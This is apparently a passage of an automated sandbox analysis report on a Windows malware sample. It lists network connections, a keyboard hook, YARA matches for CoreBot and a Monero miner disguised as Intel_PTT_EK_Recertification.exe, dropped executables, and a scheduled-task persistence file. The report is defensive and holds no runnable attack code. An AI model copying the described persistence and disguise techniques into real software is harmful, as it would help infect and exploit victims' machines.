Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.5:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.5:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.110:443 -> 192.168.2.5:50090 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,00000000

7_2_00408DBB

System Summary

Malicious sample detected (through community Yara rule)

Source: 35.2.53f7160658.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detects CoreBot Author: ditekSHen
Source: 39.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: 3f0b27a17c.exe.5.dr	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_a06bf54c-6
Source: 3f0b27a17c.exe.5.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_0b4ca910-1

Drops password protected ZIP file

Source: file.bin.7.dr

Zip Entry: encrypted

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: 53f7160658.exe.5.dr	Static PE information: section name:
Source: 53f7160658.exe.5.dr	Static PE information: section name: .idata
Source: 53f7160658.exe.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: 53fe16f582.exe.5.dr	Static PE information: section name:
Source: 53fe16f582.exe.5.dr	Static PE information: section name: .idata
Source: 53fe16f582.exe.5.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name: .idata
Source: random[2].exe.5.dr	Static PE information: section name:
Source: a98b6b83c7.exe.5.dr	Static PE information: section name:
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: .idata
Source: a98b6b83c7.exe.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: c3fed0b086.exe.5.dr	Static PE information: section name:
Source: c3fed0b086.exe.5.dr	Static PE information: section name: .idata
Source: e66237da20.exe.5.dr	Static PE information: section name:
Source: e66237da20.exe.5.dr	Static PE information: section name: .idata
Source: e66237da20.exe.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name: .idata
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: 318ea9f50d.exe.5.dr	Static PE information: section name:
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: .idata
Source: 318ea9f50d.exe.5.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_0074CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

5_2_0074CB97

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 11_2_001D96AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,

11_2_001D96AC

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A178BB	0_2_00A178BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A18860	0_2_00A18860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A17049	0_2_00A17049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A131A8	0_2_00A131A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D4B30	0_2_009D4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D4DE0	0_2_009D4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A12D10	0_2_00A12D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1779B	0_2_00A1779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A07F36	0_2_00A07F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00778860	2_2_00778860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00777049	2_2_00777049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_007778BB	2_2_007778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_007731A8	2_2_007731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00734B30	2_2_00734B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00772D10	2_2_00772D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00734DE0	2_2_00734DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00767F36	2_2_00767F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0077779B	2_2_0077779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0073E530	5_2_0073E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00756192	5_2_00756192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00778860	5_2_00778860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00734B30	5_2_00734B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00772D10	5_2_00772D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00734DE0	5_2_00734DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00750E13	5_2_00750E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00777049	5_2_00777049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_007731A8	5_2_007731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00751602	5_2_00751602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0077779B	5_2_0077779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_007778BB	5_2_007778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00753DF1	5_2_00753DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00767F36	5_2_00767F36
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00227E50	6_1_00227E50
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00214897	6_1_00214897
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F7904	6_1_001F7904
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00285735	6_1_00285735
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_00405BFC	7_2_00405BFC
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040B0E0	7_2_0040B0E0
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040B0E4	7_2_0040B0E4
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_00419973	7_2_00419973
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040A900	7_2_0040A900
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040A270	7_2_0040A270
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040AC20	7_2_0040AC20
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_00409C20	7_2_00409C20
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040D480	7_2_0040D480
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040ED00	7_2_0040ED00
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_00409DD0	7_2_00409DD0
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_00419601	7_2_00419601
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_004196DB	7_2_004196DB
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_00418F40	7_2_00418F40
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001FF13E	11_2_001FF13E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001F5458	11_2_001F5458
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001F24C0	11_2_001F24C0
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001F47AC	11_2_001F47AC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_00218817	11_2_00218817
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001E0DCC	11_2_001E0DCC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001DB114	11_2_001DB114
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001DF1B4	11_2_001DF1B4
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001EC278	11_2_001EC278
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_00213528	11_2_00213528
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_00202578	11_2_00202578
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_0020066E	11_2_0020066E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001FD66C	11_2_001FD66C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001ED858	11_2_001ED858
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001F694C	11_2_001F694C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_002149A5	11_2_002149A5
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_002099B8	11_2_002099B8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_002079DC	11_2_002079DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_0021DA30	11_2_0021DA30
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_0020FA0C	11_2_0020FA0C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_0021DC11	11_2_0021DC11
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001E7C68	11_2_001E7C68
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001E8CA8	11_2_001E8CA8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_0021DD00	11_2_0021DD00
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001F6E08	11_2_001F6E08
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001D8F18	11_2_001D8F18
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001EAF58	11_2_001EAF58

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe 375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 009E80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00768E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0074D942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0074D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0074DF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007480C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0074D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00747A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: String function: 004029A6 appears 44 times

Source: 318ea9f50d.exe.5.dr	Static PE information: Data appended to the last section found
Source: random[2].exe2.5.dr	Static PE information: Data appended to the last section found

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 35.2.53f7160658.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: 39.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9978127128746594
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9978127128746594
Source: random[1].exe.5.dr	Static PE information: Section: ZLIB complexity 0.9950706845238095
